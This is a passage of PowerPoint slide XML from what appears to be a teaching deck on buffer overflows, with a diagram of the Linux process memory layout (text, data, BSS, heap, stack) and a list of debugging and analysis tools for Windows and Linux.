        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="532" name="Shape 532"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="4567850" x="3797900"/>
            <a:ext cy="117899" cx="904499"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="533" name="Shape 533"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5236275" x="4049575"/>
            <a:ext cy="102299" cx="645000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="534" name="Shape 534"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6353050" x="4490000"/>
            <a:ext cy="0" cx="235799"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="535" name="Shape 535"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2648800" x="5598925"/>
            <a:ext cy="424799" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="536" name="Shape 536"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2648800" x="5751325"/>
            <a:ext cy="424799" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="537" name="Shape 537"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2648800" x="5903725"/>
            <a:ext cy="424799" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="538" name="Shape 538"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3687025" x="5606800"/>
            <a:ext cy="377399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="539" name="Shape 539"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3687025" x="5759200"/>
            <a:ext cy="377399" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="540" name="Shape 540"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3687025" x="5911600"/>
            <a:ext cy="377399" cx="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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Shape 545"/>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Alternate view for linux process memory layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Shape 54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machine instructions / code segments-&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Initialized global &amp; static variables ----&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uninitialized global &amp; static vars ------&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dynamic space             -----------------&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	malloc(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	new(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Program scratch space -----------------&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>local (scoped) variables, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>environment variables,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>passed arguments,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return instruction pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Shape 547"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1757700" x="4621000"/>
            <a:ext cy="4770899" cx="2944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548" name="Shape 548"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2368975" x="4643375"/>
            <a:ext cy="0" cx="2921999"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Shape 549"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1817350" x="4867000"/>
            <a:ext cy="503699" cx="2577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rgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Shape 550"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2469200" x="4867000"/>
            <a:ext cy="503699" cx="2577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rgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Shape 551"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3005075" x="4815575"/>
            <a:ext cy="503699" cx="2577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rgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Shape 552"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3731450" x="4867000"/>
            <a:ext cy="503699" cx="2577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rgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Shape 553"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5952325" x="4943200"/>
            <a:ext cy="503699" cx="2577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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Shape 554"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5991775" x="7565375"/>
            <a:ext cy="424799" cx="931800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>High memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Shape 555"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1757700" x="7717775"/>
            <a:ext cy="424799" cx="931800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Low memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="556" name="Shape 556"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3002575" x="4635925"/>
            <a:ext cy="0" cx="2929499"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="557" name="Shape 557"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="3549050" x="4649725"/>
            <a:ext cy="0" cx="2901899"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="558" name="Shape 558"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4940725" x="4613550"/>
            <a:ext cy="0" cx="2974200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="228600" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="559" name="Shape 559"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4120725" x="6275875"/>
            <a:ext cy="588899" cx="14999"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="560" name="Shape 560"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="5171699" x="6365325"/>
            <a:ext cy="849900" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="561" name="Shape 561"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4211825" x="5320450"/>
            <a:ext cy="490499" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="562" name="Shape 562"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4211825" x="5771025"/>
            <a:ext cy="490499" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="563" name="Shape 563"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4211825" x="6803025"/>
            <a:ext cy="490499" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="564" name="Shape 564"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="5223975" x="5858425"/>
            <a:ext cy="834899" cx="7499"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="565" name="Shape 565"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="5171699" x="6803025"/>
            <a:ext cy="849900" cx="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="566" name="Shape 566"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="5216474" x="5320450"/>
            <a:ext cy="849900" cx="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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Shape 57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Tools for testing/discovering Buffer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Shape 57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Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>winDBG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>OllyDBG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>IDA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>immunityDBG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en"/>
              <a:t>gdb, valgrind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>gcc/g++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" lang="en"/>
              <a:t>vi/vim/emacs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-304800" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en"/>
              <a:t>bash and perl/python/ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
